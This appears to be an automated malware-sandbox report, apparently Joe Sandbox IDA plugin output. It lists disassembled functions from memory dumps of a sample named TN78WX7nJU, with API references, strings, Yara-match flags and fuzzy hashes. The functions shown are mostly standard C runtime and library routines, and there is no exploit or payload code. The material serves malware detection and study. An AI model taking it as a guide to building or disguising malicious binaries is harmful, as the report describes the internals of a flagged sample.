Function 024924A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
GetProcAddress.KERNEL32(00000000), ref: 02492507
GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
__CxxThrowException@8.LIBVCRUNTIME ref: 02492552

Strings

kernel32.dll, xrefs: 024924B0, 024924B5, 024924FA

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: bb165416997f65df04b4a2a0e5298a38b4ae3f5dbf9295b6d20412f9f6192be1
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 5DF086769003103FBB117B757C9991B3FADDD46B32310062BF811E2291EBB589018A58

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

ios_base::eofbit set, xrefs: 0040C649
ios_base::failbit set, xrefs: 0040C644
F(@, xrefs: 0040C651
F(@, xrefs: 0040C61B
ios_base::badbit set, xrefs: 0040C63A, 0040C65A

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 024B239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024B25EC,00000001,00000001,?), ref: 024B23F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024B25EC,00000001,00000001,?,?,?,?), ref: 024B247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024B2575
__freea.LIBCMT ref: 024B2582

Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940

__freea.LIBCMT ref: 024B258B
__freea.LIBCMT ref: 024B25B0

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: b22284ccdf18279aa4bd1f70a91a509e7ccba57689c2f60cee963e24ae1c1c48
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: 4C51F272A10216ABDB26CF64CC60EEF77AAEF44754F154A2AFC04DA240DBB4DD41CA70

Function 024AE419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 024AE445
__cftoe.LIBCMT ref: 024AE477

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: dfd613974eeed67c34c02fdc6c50891be6922ed9c2229ea5b5d628f82eef36e0
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 37510832A00205ABDF259FA9DC50BAF77ADEF68334F54427FE825D6281EB31D5018A64

Function 024A302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024A3051

Part of subcall function 02498AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02498ABD

SafeSQueue.LIBCONCRT ref: 024A306A
Concurrency::location::_Assign.LIBCMT ref: 024A312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A314B
__CxxThrowException@8.LIBVCRUNTIME ref: 024A3159

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: db7712c667c082d4243ddbbeb187c6e01706e21f0237bee865d658359b1ef492
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 6231DF31A046119FCB25EF69C864BAABBB1FF54710F10859ED9068B255EB70E945CFC0

Function 02485437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0248544B
__Mtx_init.LIBCPMT ref: 02485471
std::_Cnd_initX.LIBCPMT ref: 02485494
__Thrd_start.LIBCPMT ref: 024854B9
std::_Cnd_waitX.LIBCPMT ref: 024854D9
std::_Cnd_initX.LIBCPMT ref: 02485506

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: f7529a1dacc1a483d70a761c0b941259b6dc09c63a052464892f94b3f8ea3335
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: 9021A071C21208AADF01FBF9D840BDEBBF9AF09325F54401FE104B7280DB749A448E25

Function 024A9041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024A905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024A9076
SetLastError.KERNEL32(00000000,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A90C8

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 2d13900fcbd54f275cd37ca487f3f67ec03d4353d4293964fe3dad73cb3071a9
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 3A01FC3320D7216EA72427B57CA99672755EB357B5B30033FF520493E1EF1288658D85

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,1F633895), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,1F633895), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02484FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02484FCA
int.LIBCPMT ref: 02484FE1

Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE

std::locale::_Getfacet.LIBCPMT ref: 02484FEA
std::_Facet_Register.LIBCPMT ref: 0248501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02485031
__CxxThrowException@8.LIBVCRUNTIME ref: 0248504F

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 5c43502c7d1c2b6603fea09ba7882039da7b2105ff86d9db859e625ce53303c6
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: E311C2319202289BCB25FB65D800AEE77B2BF05314F55051FE816AB2D0DF749A06CFD0

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 0248C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0248C401
int.LIBCPMT ref: 0248C418

Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE

std::locale::_Getfacet.LIBCPMT ref: 0248C421
std::_Facet_Register.LIBCPMT ref: 0248C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0248C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0248C486

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 080d1e1ab3d2e7bfcfc859a30103bf800f74dfddc59c058dfe66ee1bff4fa622
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 4411E5719102289BCF19FB65C844AFD7776AF40714F10051FE811BB290DF748A41CFA0

Function 02484E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02484E8C
int.LIBCPMT ref: 02484EA3

Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE

std::locale::_Getfacet.LIBCPMT ref: 02484EAC
std::_Facet_Register.LIBCPMT ref: 02484EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02484EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02484F11

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: c9fed2677125e939422074f424157d3a327a9436136dc500938c97e5e74ffdec
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: CA11CE329102299BCF15FBA5D800AEE77B2AF44314F14051FE911B7290EF749A01CF90

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 024C08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 024C08F8
make_shared.LIBCPMT ref: 024C0943

Strings

RCC, xrefs: 024C092A
v)D, xrefs: 024C08F3
MOC, xrefs: 024C091B

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: d89199b3ae4fef76cffa81a27c3a1dc02c5c22ed7ca3ae60add89021205471e6
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 1AF04FB5A00614DFDF5AFF69C41076D3B69BF22B04F5A909BF4405B2A0CB785988CFA1

Function 024AB36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
Instruction ID: b27f609adf0015fc56f8b9ea66ec14800685be707f0b7ec8525cc07e8f04d9f6
